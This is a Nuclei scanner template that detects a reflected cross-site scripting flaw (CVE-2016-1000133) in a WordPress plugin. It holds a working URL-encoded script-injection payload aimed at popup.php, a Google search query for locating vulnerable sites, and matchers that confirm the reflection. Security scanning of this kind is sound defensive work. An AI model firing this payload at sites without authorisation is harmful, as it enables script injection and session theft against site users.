nuclei-templates/http/cves/2016/CVE-2016-1000133.yaml

48 lines
1.7 KiB
YAML

id: CVE-2016-1000133
info:
name: WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Wordpress plugin forget-about-shortcode-buttons 1.1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wordpress.org/plugins/forget-about-shortcode-buttons
- http://www.vapidlabs.com/wp/wp_advisory.php?v=602
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000133
cwe-id: CWE-79
epss-score: 0.00142
cpe: cpe:2.3:a:designsandcode:forget_about_shortcode_buttons:*:*:*:*:*:wordpress:*:*
epss-percentile: 0.49194
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons"
framework: wordpress
vendor: designsandcode
product: forget_about_shortcode_buttons
tags: cve,cve2016,wordpress,xss,wp-plugin
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200